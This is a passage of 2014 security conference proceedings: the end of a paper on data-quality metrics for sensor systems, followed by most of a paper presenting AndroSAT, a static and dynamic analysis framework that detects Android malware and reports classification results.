attributes for an electric meter. Table II describes some
application specific attributes, which are device and
application specific. Figure 4 illustrates configuring an
application-specific attribute for an electric meter, provided
as an example.
The second stage involves data quality computation. The
configured generic and application specific attributes help
compute the individual quality scores. Each attribute is
considered a quality indicator, whose significance will be
dependent on its max score. These quality indicators
produce a quality score using a chosen logic procedure. For
example, we can consider a generic attribute called timesince-calibration. Some devices need to get calibrated every
year. If a device has not been calibrated for an entire year or
a couple of years, the quality factor for that indicator will go
down. If the device has never been calibrated since its
installation it can affect the quality score even more. The
tool allows a user to define the procedure for calculating the
application-specific quality indicators.
VI.
CONCLUSIONS
The paper introduces a novel approach to data
management in data collection and processing systems,
which might incorporate SCADA, sensor networks and
other systems with nanoscale devices. We associate each
data entity with the corresponding DQ indicator. This
indicator integrate various data characteristics ranging from
accuracy to security, privacy and safety, etc. It considers
various samples of DQ metrics representing communication
and computing security as well as data accuracy and other
characteristics. Incorporating security and privacy measures
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
into the DQ calculus is especially important in the current
development as it allows shifting the DQ assessment from
the point of data origin to the point of data use.
A unified framework for assessing DQ is critical for
enhancing data usage in a wide spectrum of applications
because this creates new opportunities for optimizing data
structures, data processing and fusion based on the new DQ
information use. By providing to an end user or an
application the DQ indicators which characterize system and
network security, data trustworthiness and confidence, etc.
Correspondingly, an end user is in a much better position to
decide whether and how to use data in various applications.
A user will get an opportunity to understand and compare
various data files, streams and sources based on the
associated DQ with integral quality characteristics reflecting
various aspects of system functionality and to redesign data
flows schemes. This development will transform onedimensional data processing into multi-dimensional data
optimization procedures for application-specific data
applications. We describe and demonstrate an application of
the DQ metrics definition and calculation tools, which
enable integration of various metrics to calculate an integral
indicator.
REFERENCES
[1] P. W. Coteus, J. U. Knickerbocker, C. H. Lam and Y. A.
Vlasov, “Technologies for exascale systems,” IBM Journal of
Research and Developments, vol. 55, issue 5, pp. 14.1-14.12,
2011.
[2] Handbook on Nano and Molecular Electronics, Ed. S. E.
Lyshevski, CRC Press, Boca Raton, FL, 2007.
[3] B. G. Lee et. al., “Monolithic silicon integration of scaled
photonic switch fabrics, CMOS logic, and device driver
circuits,” Journal of Lightwave Technology, vol. 32, issue 4,
pp. 743-751, 2014.
[4] S. E. Lyshevski, Molecular Electronics, Circuits and
Processing Platforms, CRC Press, Boca Raton, FL, 2007.
[5] Micro-Electromechanical Systems (MEMS), International
Technology Roadmap for Semiconductors, 2011 and 2013
Editions, available at www.itrs.net , accessed on August 1,
2014.
[6] A. Yariv, Quantum Electronics, John Wiley and Sons, New
York, 1988.
[7] Emerging Research Devices, International Technology
Roadmap for Semiconductors, 2011 and 2013 Editions,
available at www.itrs.net , accessed on August 1, 2014.
[8] J. Warnock, “Circuit and PD challenges at the 14nm
technology node,” Proc. 2013 ACM Int. Symposium on
Physical Design, pp. 66-67, 2013.
[9] M. Klein and W. Lehner, "Representing Data Quality in
Sensor Data Streaming Environments," J. Data and
Information Quality, vol. 1, pp. 1-28, 2009.
[10] S. Guha, A. Meyerson, N. Mishra, R. Motwani, and L.
O'Callaghan, "Clustering Data Streams: Theory and Practice,"
IEEE Trans. on Knowl. and Data Eng., vol. 15, pp. 515-528,
2003.
122
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
[11] H. S. Lim, K. M. Ghinita, and E. Bertino "A Game-Theoretic
Approach for High-Assurance of Data Trustworthiness in
Sensor Networks," presented at the IEEE 28th International
Conference on Data Engineering (ICDE 2012), Washington,
DC, USA, 2012.
[12] C. Dai, H.S. Lim, and E. Bertino "Provenance-based
Trustworthiness Assessment in Sensor Networks," , 7th
Workshop on Data Management for Sensor Networks
(DMSN), in conjunction with VLDB, DMSN 2010,
Singapore, 2010.
[13] S. Chobsri, W. Sumalai, and W. Usaha, "Quality assurance
for data acquisition in error prone WSNs," in Ubiquitous and
Future Networks, 2009. ICUFN 2009. First International
Conference on, 2009, pp. 28-33.
[14] W. Dong, H. Ahmadi, T. Abdelzaher, H. Chenji, R. Stoleru,
and C. C. Aggarwal, "Optimizing quality-of-information in
cost-sensitive sensor data fusion," in 2011 International
Conference on Distributed Computing in Sensor Systems
(DCOSS 2011), 27-29 June 2011, Piscataway, NJ, USA,
2011, 8 pp.
[15] W. Yinfeng, W. Cho-Li, C. Jian-Nong, and A. Chan,
"Optimizing Data Acquisition by Sensor-channel Coallocation in Wireless Sensor Networks," in 2010
International Conference on High Performance Computing
(HiPC 2010), 19-22 Dec. 2010, Piscataway, NJ, USA, 2010,
p. 10 pp.
[16] L. Reznik, "Integral Instrumentation Data Quaity
Envaluation: the Way to Enhance Safety, Security, and
Environment
Impact,"
2012
IEEE
International
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Instrumentation and Measurement Technology Conference,
Graz, Austria, May 13-16, 2012, 2012.
[17] S. E. Lyshevski and L. Reznik, "Processing of extremelylarge-data and high-performance computing," in International
Conference on High Performance Computing, Kyiv, Ukraine,
2012, pp. 41-44.
[18] G. P. Timms, P. A. J. de Souza, L. Reznik, and D. V. Smith,
"Automated Data Quality Assessment of Marine Sensors,"
Sensors, vol. 11, pp. 9589-9602, 2011.
[19] G. P. Timms, P. A. de Souza, and L. Reznik, "Automated
assessment of data quality in marine sensor networks," in
OCEANS 2010 IEEE - Sydney, 2010, pp. 1-5.
[20] F. G. Alizamini, M. M. Pedram, M. Alishahi, and K. Badie,
"Data quality improvement using fuzzy association rules," in
Electronics and Information Engineering (ICEIE), 2010
International Conference On, 2010, pp. V1-468-V1-472.
[21] L. Sebastian-Coleman, Measuring Data Quality for Ongoing
Improvement: A Data Quality Assessment Framework:
Morgan-Kaufmann Publishers, 2013.
[22] ANSI/NCSL, "US Guide to the Expression of Uncertainty in
Measurement," ed, Z540-2-1997.
[23] National Institute of Standards and Technology, "Performance
Measurement Guide for Information Security," ed.
Geithersburg, MD, July 2008.
[24] L. Reznik and E. Bertino, "Poster: Data quality evaluation:
integrating security and accuracy," Proceedings of the 2013
ACM SIGSAC conference on Computer communications
security, Berlin, Germany, 2013.
123
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
AndroSAT: Security Analysis Tool for Android Applications
Saurabh Oberoi∗ , Weilong Song† , Amr M. Youssef‡
Concordia Institute for Information Systems Engineering
Concordia University
Montreal, Quebec
Abstract—With about 1.5 million Android device activations per
day and billions of application installation from Google Play,
Android is becoming one of the most widely used operating
systems for smartphones and tablets. In this paper, we present
AndroSAT, a Security Analysis Tool for Android applications.
The developed framework allows us to efficiently experiment
with different security aspects of Android Apps through the
integration of (i) a static analysis module that scans Android Apps
for malicious patterns. The static analysis process involves several
steps such as n-gram analysis of dex files, de-compilation of the
App, pattern search, and analysis of the AndroidManifest file;
(ii) a dynamic analysis sandbox that executes Android Apps in a
controlled virtual environment, which logs low-level interactions
with the operating system. The effectiveness of the developed
framework is confirmed by testing it on popular Apps collected
from F-Droid, and malware samples obtained from a third
party and the Android Malware Genome Project dataset. As
a case study, we show how the analysis reports obtained from
AndroSAT can be used for studying the frequency of use of
different Android permissions and dynamic operations, detection
of Android malware, and for generating cyber intelligence about
domain names involved in mobile malware activities.
Keywords–Android Security; Static Analysis; Dynamic Analysis.
I. I NTRODUCTION
According to a recent report from Juniper Networks [1],
smartphone sales have increased by 50% year-on-year. In the
third quarter of 2013, more than 250 million smartphones were
sold worldwide. This rapid increase of smartphone usage has
moved the focus of many attackers and malware writers from
desktop computers to smartphones. Today, mobile malware is
far more widespread, and far more dangerous, especially in
Bring Your Own Device (BYOD) arrangements where mobile
devices, which are often owned by users who act as defacto
administrators, are being used for critical business and are also
being integrated into enterprises, government organizations and
military networks [2][3].
Android, being one of the utmost market share holders,
not only for smartphones and tablets, but also in other fields
such as automotive integration, wearables, smart TVs and
video gaming systems, is likely to be facing the highest threat
from malware writers. As an open-source platform, Android is
arguably more vulnerable to malicious attacks than many other
platforms. According to the report from Juniper Networks [1],
mobile malware grew 614% for a total of 276,250 malicious
Apps from March 2012 to March 2013. Another recent report
from Kaspersky [4] shows that 99% of all mobile-malware in
the wild is attacking the Android platform. Kaspersky also
mentioned that mobile malware is no longer an act of an
individual hacker; some rogue companies are investing time
and money to perform malicious acts such as stealing credit
card details and launching phishing attacks, to gain profit.
According to the Kaspersky report, the number of unique
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
banking trojans raised from 67 to 1321 from the start to the end
of 2013. Thousands of users were convinced to pay millions
of dollars due to the gradual dissemination of infected Apps.
In extreme cases, an application with malicious intent can do
more than just sending premium text messages–they can turn
a phone into a spying tool. These spying tools can track the
current location of a smartphone, make phone calls, send and
receive text messages and send stolen private information to
remote servers without raising any alarm.
In this paper, we present a Security Analysis Tool for
Android applications, named AndroSAT. The developed framework allows us to experiment with different security aspects
of Android Apps. In particular, AndroSAT comprises of:
•
•
•
A static analysis module that scans Android Apps
for malicious patterns (e.g., potentially malicious API
calls and URLs). This process involves several steps
such as n-gram analysis of dex files, de-compilation
of the App, pattern search, and extracting security
relevant information from the AndroidManifest files.
A dynamic analysis sandbox that executes Android
Apps in a controlled virtual environment, which logs
low-level interactions with the operating system.
Analysis tools and Add-ons for investigating the output of the static and dynamic analysis modules.
In order to demonstrate the effectiveness of our framework,
we tested it on popular Apps collected from F-Droid [5],
which is a Free and Open Source Software (FOSS) repository
for Android applications, and a malware dataset obtained
from a third party as well as from the Android Malware
Genome Project. The reports produced by our analysis were
used to perform three case studies that aim to investigate the
frequency of use of different Android permissions and dynamic
operations, detection of malicious Apps and generating cyber
intelligence about domain names involved in mobile malware
activities. The results obtained by the first case study can be
utilized to narrow down the list of features that can be used to
determine malicious patterns. In the classification experiment,
using the features extracted from our analysis reports, we applied feature space reduction, and then performed classification
on the resultant dataset. As will be explained in Section V, the
obtained classification results are very promising. Finally, in
our cyber-intelligence gathering experiment, we used the IP
addresses recorded during the static and dynamic analysis of
malware Apps to produce a graphical representation of the
geographical locations of possible malicious servers (and their
ISPs) that communicate with malicious Apps. These three
experiments show the versatility as well as the wide variety
of possible usages for the information obtained by AndroSAT.
The rest of the paper is organized as follows. In the next
section, we discuss some related work. A brief review of
124
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Android and its security model is provided in Section III.
Section IV details the design of our framework and explains
the static and dynamic analysis modules. Our experimental
results are presented in Section V. Finally, our conclusion is
given in Section VI.
II.
R ELATED W ORK
Due to sudden increase in the number of Android malware,
researchers too have moved their focus and resources towards
securing the Android platform from this rising threat. Blasing
et al. [6] developed a system named AASandbox that utilizes a
loadable kernel module to monitor system and library calls for
the purpose of analyzing Android applications. Wu et al. [7]
developed a system named DroidMat that extracts the information from an AndroidManifest and, based on the collected information, it drills down to trace the application programming
interface(API) calls related to the used permissions. It then
uses different clustering techniques to identify the intentions
of the Android malware. Reina et al. [8] developed a system
named CopperDroid, which performs the dynamic analysis of
an Android application based upon the invoked system calls.
They claimed that their system can detect the behavior of an
application whether it was initiated through Java, Java Native
Interface or native code execution. Burguera et al. [9] focused
on identifying system calls made by Android applications and
developed a tool named Crowdroid to extract the system calls
and then categorize these system calls into either malicious or
benign by using K-means clustering. DroidRanger, a system
proposed in [10], consists of a permission-based behavioral
footprinting scheme that detects new samples of known Android malware families and a heuristics-based filtering scheme
that identifies certain inherent behaviors of unknown malicious
families.
Spreitzenbarth et al. [11] developed a system named
Mobile-Sandbox, which is designed to perform integrated
analysis and some specific techniques to log calls to non-Java
APIs. Alazab et al. [12] used DroidBox, a dynamic analysis
tool that generates logs, behavior graph and treemap graphs
to explain the behavior of an Android App. They collected
33 malicious applications grouped into different families and
scanned them with different antivirus. They combined the
graphs of the applications within the same family to verify
if the graphs eventually reflect the family and then compared
it with results from different antivirus companies. Another
dynamic analysis tool named TaintDroid is presented in [13],
which is capable of simultaneously tracking multiple sources
of sensitive data accessed by Android application. In the work
reported in [14][15], n-gram features are extracted from benign
and malware executables in Windows PE format. The extracted
features are then used to generate model with classifiers
supported by WEKA.
Compared to other related work, one key feature in our system, AndroSAT, is that the developed sandbox allows not only
for observing and recording of relevant activities performed
by the apps (e.g., data sent or received over the network, data
read from or written to files, and sent text messages) but also
manipulating, as well as instrumenting the Android emulator.
These modifications were made to the Android emulator in
order to evade simple detection techniques used by malware
writers.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
III. A NDROID OVERVIEW
Android is an emerging platform with about 19 different
versions till date [16]. Table I shows different Android versions
with their corresponding release date. As shown in Figure 1,
the Android framework is built over Linux kernel [17] that
controls and governs all the hardware drivers such as audio,
camera and display drivers. It contains open-source libraries
such as SQLite, which is used for database purposes, and
SSL library that is essential to use the Secure Sockets Layer
protocol. The Android architecture contains Dalvik Virtual
Machine (DVM), which works similar to the Java Virtual
Machine (JVM). However, DVM executes .dex files whereas
JVM executes .class files.
TABLE I. ANDROID VERSION HISTORY
Android Version
1.0
1.1
1.5
1.6
2.0-2.1
2.2
2.3.x
3.1-3.2
4.0.3-4.0.4
4.1.x-4.3
4.4
OS Name
Alpha
Beta
Cupcake
Donut
Eclair
Froyo
Gingerbread
Honeycomb
Ice Cream Sandwich
Jelly Bean
KitKat
Release Date
09/2008
02/2009
04/2009
09/2009
10/2009
05/2010
12/2011
02/2011
10/2011
08/2012
09/2013
Figure 1. Android architecture [17]
Every application runs in its own Dalvik virtual environment
or sandbox in order to avoid possible interference between
applications and every virtual environment running an application is assigned a unique User-ID (UID). The application layer
consists of the software applications with which users interact.
This layer communicates with the application framework to
perform different activities. This application framework consists of different managers, which are used by an Android
application. For example, if an application needs access to an
125
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 2. Overview of AndroSAT
incoming/outgoing phone call, it needs to access TelephonyManager. Similarly, if an application needs to pop-up some
notifications, it should interact with NotificationManager.
An Android application, also known as an APK package, consists of AndroidManifest.xml, res, META-INF, assets
and classes.dex files. The AndroidManifest.xml file contains
information about supported versions, required-permissions,
services-used, receivers-used, and features-used [17]. METAINF contains the certificate of the application developer,
resource directory (res) contains the graphics used by an
applications such as background, icon and layout [17]. Assets
directory contains the files used by an Android application,
such as SQLite database and images. The classes.dex file is
an executable file in a format that is optimized for resource
constrained systems.
IV. S YSTEM OVERVIEW
In this section, we provide an overview of AndroSAT. A
local web-server is setup where we can upload the Android
applications into our Droid-Repository (MySQL database of
Android applications to be analyzed) through a PHP webpage
(DroidShelf). As depicted in Figure 2, AndroSAT includes two
main modules, namely a static analysis module and a dynamic
analysis module, which are used together to produce analysis
reports in both XML and pdf formats. The produced XML
reports can then processed using several add-ons and analysis
tools.
A. Static Analysis
Static analysis techniques aim to analyze Android Apps
without executing them. The objective of these techniques is to
understand an application and predict what kind of operations
and functionalities might be performed by it without executing
it. Different forms of static analysis have proved to be very
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 3. Overview of the static analysis module
useful in detecting malicious Apps. As shown in Figure 2 and
Figure 3, the process of static analysis involves several steps
such as extracting n-gram statistics of .dex files, disassembling
the application, performing pattern search for malicious API
calls and URLs, and extracting relevant information (such
as used permissions, activities, intents and actions, services,
and receivers) from the AndroidManifest file. In order to
perform the static analysis process, the analyzed application
is first fetched from the Droid-Repository. Then, data from
AndroidManifest file is extracted from the APK package using
the Android Asset Packaging Tool (AAPT). AAPT is used for
compiling the resource files during the process of Android App
126
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
development, and is included in the Android SDK package
[18]. After the n-gram statistics is evaluated from the .dex file,
the application is fed to the disassembler, which disassembles
the application APK package to obtain the SMALI and Java
code of the application. The disassembly process is performed
using APKTool [19] and Apk2java [20], which are open source
reverse engineering tools. Once the source code is obtained
from the Android application undergoing analysis, we search
for malicious functions/API calls, URLs and IP addresses. In
what follows we provide some further details on the n-gram
analysis process and the different features extracted from both
AndroidManifest and source code.
1) N-gram Analysis: Different forms of n-gram analysis
have been previously used for malware detection in the Windows and Linux/Unix environments. Different from Portable
Executables (PE) but similar to MSI packages in Windows,
Android OS has Android application package file (APK)
as the file format used to install application software. The
APK file can be looked at as a zip compression package
containing all of the application bytecode including classes.dex
file, compiled code libraries, application resource (such as
images, and configuration files), and an XML file, called
AndroidManifest. The classes.dex file holds all of application
bytecode and implementing any modification in the application
behavior will lead to a change in this file. The process of ngram analysis is performed by extracting application bytecode
files (i.e., classes.dex), calculating byte n-gram, and then
performing a dimensionality reduction step for these calculated
n-gram features. The byte n-grams are generated from the
overlapping substrings collected using a sliding window where
a window of fixed size slides one byte every time. The ngram feature extraction captures the frequency of substrings
of length n byte. Since the total number of extracted features
is very large, we apply feature reduction to select appropriate
features for malware detection. We chose Classwise Document
Frequency [14] as our feature selection criterion. AndroSAT
applies feature reduction on bigram and trigram sorted by
CDF value and top k features are selected. The obtained
feature vectors are saved in the analysis reports and can then be
used as inputs for classifier to generate models for malicious
Apps. Surprisingly, as will be shown in the experimental
results Section V, applying this simple analysis method to
.dex files even without any pre-processing or normalization for
the byte code yields very promising results and allows us to
differentiate between malicious and benign applications with
relatively very good accuracy.
2) Features extracted from the AndroidManifest file:
Throughout the analysis process, the following features are
extracted from the AndroidManifest file of analyzed applications:
•
Requested Permissions: An Android application does
not need any permission unless it is trying to use
a private or system related resource/functionality of
the underlying Android device. There are numerous permissions that developers can add into an
Android application to provide better experience to
users. Example of these permissions include CAMERA, VIBRATE, WRITE EXTERNAL STORAGE,
RECEIVE SMS, and SEND SMS [5]. Permissions
requested by an application inform user about what
they can expect from the application and a smart
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
user can easily realize if an application is asking for
more than it should supposedly do. For example, an
application claiming to show weather reports should
raise suspicion if it requests a SEND SMS permission.
• Features Used: An Android application can use hardware or software features. The features available (e.g.,
bluetooth, and camera) vary with different Android
devices. Therefore, many applications use feature as
a preference, i.e., they can still function even if the
feature is not granted. Features come with a required
attribute that helps a developer to specify whether the
application can work normally with or without using
the specific feature.
• Services-Used: Services-Used lists all the services
recorded in the application AndroidManifest file. In an
Android application, a service can be used to perform
operations that need to run at the background for a
long time and without any user interaction. The service
keeps on running even if the user switches to another
application. An attacker can make use of a service to
perform malevolent activities without raising an alarm.
• Receivers Used: In Android, events send out a broadcast to all the applications to notify their occurrence.
A broadcast is triggered once the event registered
with the corresponding broadcast receiver [21] occurs.
The main purpose of using a broadcast receiver is
to receive a notification once an event occur. For
example, if there is a new incoming message, a
broadcast about the new incoming message is sent out
and applications that use the corresponding receiver,
i.e., SMS RECEIVED receiver will get the incoming
message. Malicious applications can use the broadcast
receiver in numerous ways such as receive the incoming messages and monitor the phone state.
• Intents and Actions: An intent or action specifies
the exact action performed by the broadcast receiver
used in an application. Some of the most widely
used broadcast receivers include SMS RECEIVED,
and BOOT COMPLETED.
• Activities Used: Activities-used is a list of all the
activities used in an Android application. In Android,
every screen that is a part of an application and with
which users can interact is known as an activity. An
application can have more than one activity.
3) Feature Extraction from Source Code: In this section,
we list the features extracted from the decompiled SMALI and
Java source code.
• getLastKnownLocation: This function is used to get
the last know location from a particular location
provider. Getting this information does not require
starting the location provider, which makes it more
dangerous and invisible. Even if this information is
stale, it is always useful in some contexts for malicious
App developers.
• sendTextMessage: This function is most widely used
by many malware developers to earn money or to
send bulk messages while hiding their identity. The
biggest advantage that attackers have when utilizing
this function is that it sends text messages in the
background and does not require any user intervention.
127
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
•
getDeviceId: This function is used to obtain the International Mobile Station Equipment Identity (IMEI)
number of the Android device. Every device has its
own unique IMEI that can be used by the service
provider to allow the device to access the network
or block its access to the network. IMEIs of stolen
phones are blacklisted so that they never get access to
the network. An attacker with malevolent intentions
can use this unique code to make a clone and then
performs illegal activities or blacklists the IMEI so
that the user can never put it back onto the cellular
network.
All the features extracted by the static analysis module are then
fed to a parser module in order to remove redundant data. The
extracted relevant information is then saved in both XML and
PDF formats.
B. Dynamic Analysis
The main advantage of the static analysis described above
is that it can be performed relatively very efficiently without
the need to execute the Apps and hence avoid any risk associated with executing malicious Apps. On the other hand, some
malware writers use different obfuscation and cryptographic
techniques that make it almost impossible for static analysis
techniques to obtain useful information, which makes it essential to use dynamic analysis. Dynamic analysis is most widely
used to analyze the behavior and interactions of an application
with the operating system. Typically, dynamic analysis is
performed using a virtual machine controlled environment in
order to avoid any possible harm that can result from running
the malware on actual mobile devices. Furthermore, using the
virtual environment makes it easier to prepare a fresh image
and install the new application in question on it for analysis.
The main disadvantage of dynamic analysis, however, is
that the usefulness of the analysis is somewhat correlated to
the length of the analysis interval and some malicious activities
may not be invoked by the App during the, usually short,
analysis interval either because the conditions to trigger these
events do not happen during the dynamic analysis process or
because the malicious App is able to detect that it is being
monitored. Anti-debugging and virtual machine detection techniques have long been used by Windows malware writers. To
make the virtual environment look like a genuine smartphone,
we made some changes to the Android emulator, e.g., we
modified IMEI, IMSI, SIM serial number, product, brand and
other information related to the phone hardware.
During dynamic analysis, the application is installed onto
the system and its activities or interactions are logged to
analyze its actions. We use a sandbox to execute the Android
application in question in a controlled virtual environment.
Figure 4 shows an overview of our dynamic analysis module. The main part of this module is based on an open
source dynamic analysis tool for Android applications named
DroidBox [22]. However, as mentioned above, we performed
some modifications in order to improve the resistance of the
emulator against detection. AndroSAT launches the emulator
using DroidBox that uses its own modified image making it
possible to log the system and API level interactions of an
Android application with the emulator. Once the emulator is up
and running, the App is installed using Android Debug Bridge
(ADB) for further analysis. Immediately after the successful
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 4. Overview of the dynamic analysis module
installation of the application, the module starts DroidBox to
further analyze the APP for a configurable interval (the default
is two minutes). Meanwhile, it launches the main activity of the
installed application onto the emulator automatically, performs
random gestures on it and takes screen shots of the application using the MonkeyRunner tool [23], while DroidBox
consistently logs any system or API level interactions of the
application with the operating system. The following features
are collected during our dynamic analysis:
•
•
•
•
File Activities: File activities consist of information
regarding any file, which is read and/or written by the
application. This information includes timestamps for
these file activities, absolute path of accessed files and
the data, which was written to/read from these files.
Crypto Activities: Crypto Activities consist of information regarding any cryptographic techniques used
by the application. It includes information regarding
the type of operation (e.g., key generation, encryption,
and decryption) performed by the application, algorithms used (e.g., AES, DES), key used and the data
involved.
Network Activities: It unveils the connections opened
by the application, packets sent and received. It also
provides detailed information about all these activities
including the timestamp, source, destination and ports.
Dex Class Initialized: In Android, an application can
initialize a dex file, which is not a part of its own
package. In the most malicious way, an application
can download a dex file to the Android device and
then executes it using the DexClassLoader. This way,
an application under analysis will come out clean,
which makes it almost impossible for any malware
analyzer or sandbox to detect the malicious activities
128
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
•
•
•
•
•
•
performed by the application. DroidBox logs relevant
details whenever an application initializes any dex
class.
Broadcast Receiver: As explained earlier, the use of
broadcast receiver helps improve the user experience
of an application. However, an attacker can use this
functionality to easily gain access to private/critical
data without raising an alarm in the users’ mind.
We log information regarding any broadcast receiver
used by the application and record the name of the
broadcast and the corresponding action.
Started Services: Services play a very critical role
in Android applications. They are used to execute
the code in the background without raising an alarm.
Started services provide the information about any
service, which is started or initialized during the
runtime of the application.
Bypassed permissions: Lists the permission names,
which are bypassed by the application. This aims to
detect scenarios where an application can perform the
task that needs a specific permission without explicitly using that permission. For example, an Android
application can direct the browser to open a webpage
without even using the Internet permission [24].
Information Leakage: Information leakage can occur
through files, SMS and network. Leakage may occur
through a file if the application tries to write or read
any confidential information (e.g., IMEI, IMSI, and
phone number) of an Android device to or from a
file. Leakage occurs through SMS if the information
is sent through an SMS. Timestamp, phone number
to which the information is sent, information type,
and data involved are also logged. Leakage occurs
through network if the application sends critical data
over the Internet. Timestamp, destination, port used,
information type and data involved is recorded. Detailed information about the absolute path of the file,
timestamp, operation (read or write), information type
(IMEI, IMSI or phone number) and data are logged.
Sent SMS: If an Android application tries to send
a text message, timestamp, phone number and the
contents of the text message are logged.
Phone call: If an Android application tries to make a
phone call, timestamp and phone number are recorded.
Dynamic analysis module logs all these features into a text
file, which is then sent to the parser module to remove any
redundant data. The extracted relevant information is then
saved in XML and PDF formats.
V. E VALUATION
The reports generated by our framework contain useful information regarding the analyzed Android applications,
which in turn can be used in many Android security related
applications. To confirm the effectiveness of our proposed
framework, we analyzed a total of 1932 Android applications,
out of which 970 are benign and 962 are malicious. We
collected the malicious samples from the Android Malware
Genome Project [25] and from another third party. The benign
samples were obtained from F-Droid [18], which is a Free
and Open Source Software (FOSS) repository for Android
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
applications. We also verified the applications collected from
F-Droid are benign using VirusTotal [26].
Results from the dynamic analysis show that 254 out of 962
(i.e., 26%) malicious applications and none of the 970 benign
applications lead to private data leakage through network.
Many malware writers use cryptographic techniques to hide
the malicious payload in order to make it impossible for a
signature based malware analyzer to understand the malicious
intentions of an application. Among the analyzed Apps 41
out of 962 malicious applications and 2 out of 970 benign
applications use cryptography at runtime. The experimental
results also suggest that an Android application with different
versions might have different package contents and hence
the checksum of the packages might differ. However, the
checksum of classes.dex file of some different versions came
out to be the same. This tells us that malware writers might
add junk data in the APK package to make an application look
different while the content of classes.dex file remains the same.
We incorporated the reports generated by our framework
and used them to perform three case studies, namely performing frequency analysis for the different permissions and
operations used by Android Apps, cyber-intelligence and classification.
A. Frequency analysis of Android permissions and dynamic
operations
Figure 5(a) shows the top 15 permissions used by the
analyzed malicious applications and their frequency as compared to the benign ones. It is interesting to find out that
some permissions are used by most of the malicious applications. As depicted in Figure 5(a) READ PHONE STATE
permission is used by ≈86% of the malicious Apps as
compared to ≈12.% of the benign Apps. This permission
is most widely used to obtain system specific data such as
IMEI, IMSI, phone number and SIM serial. Similarly, the
frequency of use of INTERNET, ACCESS WIFI STATE, ACCESS NETWORK STATE, READ SMS, and WRITE SMS
show noticeable differences. Figure 5(b) shows the top 15
permissions used by the analyzed benign applications and their
frequency as compared to the analyzed malicious applications.
In total, 962 malicious applications used 10,203 permissions,
which come to an average of 10.6 permissions per application.
On the other hand, 970 benign applications used 3,838 permissions, which come to an average of around 3.95 permissions
per application. These results confirm that, on average, the
number of permissions requested by a benign application is
less than the number of permissions requested by a malicious
application.
Figure 5(c) shows the top 15 dynamic operations performed by the analyzed malicious applications. As shown
in the figure, there are many operations that are dominantly performed by the malicious applications. These include BroadcastReceiver(BOOT COMPLETED), OpenNetworkConnection:80, and DataLeak Network. Applications
with malicious intents use BOOT COMPLETED broadcast
receiver to receive a notification whenever an Android device
boots up so that they can perform the intended malicious
activity or launch malicious services that keep running in the
background. Another deciding factor is data leakage through
network, which has a high occurrence in our malicious dataset,
i.e., 254 as compared to 0 in the analyzed benign ones. Figure
129
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 5. Most frequently used permissions and dynamic operations for the analyzed Apps
5(d) shows the top 15 dynamic operations performed by the
benign applications in our dataset.
B. Cyber-intelligence
One of the main objectives of cyber-intelligence is to track
sources of online threats. In this work, we used the URLs and
IP addresses recorded during the static and dynamic analysis
of malware Apps to produce a graphical representation of the
geographical locations of possible malicious servers (and their
ISPs) that communicate with these malicious Apps. Figure 6
shows a sample output of this analysis (IP addresses are not
shown for privacy and liability concerns).
Figure 6. Geographical Presentation of the locations of suspected IPS
C. Malware detection
Throughout this experiment, we incorporated 134 static,
285 dynamic and 400 n-grams based features. We performed
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
our classification task on 1932 Android applications using
different combinations of these features, namely static analysis
features, dynamic analysis features, n-grams based features,
combination of static & dynamic features (S+D), combination
of static & n-grams based features (S+N) and combination of
dynamic & n-grams based features (D+N). We also combined
features from all three analysis techniques, i.e., static, dynamic
and n-grams (S+D+N) and performed feature space reduction
using classwise document frequency to obtain a feature-set
containing the top features for classification. We employed five
different algorithms supported by WEKA [27] for classification
with 10-fold cross-validation: SMO [28], IBK [28], J48 [28],
AdaBoost1(J48 as base classifier) [28], and RandomForest
[28]. Our experimental results show that AdaBoost1 and
RandomForest models achieve a better accuracy compared to
the other models. Figure 7 shows the results obtained for
the five different feature sets in terms of accuracy, precision,
and recall. From Figure 7(a), it is clear that n-gram features
using AdaBoost1, D+N features using AdaBoost1 and S+D+N
features using RandomForest provide the highest accuracy
≈98%. Figure 7(b) and Figure 7(c) shows the corresponding
precision and recall, respectively. The low accuracy obtained
when using dynamic analysis only can be explained by noting
that, throughout our dynamic analysis process, we do not
interact with the applications with carefully chosen gestures.
Consequently, there is no guarantee that we check complete
paths that can be traversed by the application or even a
good portion of it. Furthermore, the short dynamic analysis
interval might not be enough to trigger some of the bad events
performed by malicious Apps. On the other hand, it should not
be noted that the relatively high accuracy obtained with the
combined features should also be interpreted with care since
it might have resulted because of the limited variance in the
130
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
characteristics of the analyzed samples.
Figure 7. The classification results
VI. C ONCLUSION
The increasing popularity of the Android operating system
has led to sudden escalation in Android malware. In this work,
we developed a framework to analyze Android applications
using static and dynamic analysis techniques (AndroSAT). The
effectiveness of AndroSAT was tested by analyzing a dataset of
1932 applications. The information obtained from the produced
analysis reports proved to be very useful in many Android
security related applications. In particular, we used the data
in these reports to perform three case studies: analyzing the
frequency of use of different Android permissions and dynamic
operations for both malicious and benign Apps, producing
cyber-intelligence information, and maleware detection. The
implemented prototype can be further extended to allow for
more useful add-ons that can be used to provide further
investigation of the security of Android applications.
R EFERENCES
[1]
[2]
[3]
[4]
“Third
Annual
Mobile
Threats
Report,”
2013,
URL:
http://www.juniper.net/us/en/local/pdf/additional-resources/3rd-jnprmobile-threats-report-exec-summary.pdf [accessed: 2014-09-05].
Q. Li and G. Clark, “Mobile security: a look ahead,” Security & Privacy,
IEEE, vol. 11, no. 1, 2013, pp. 78–81.
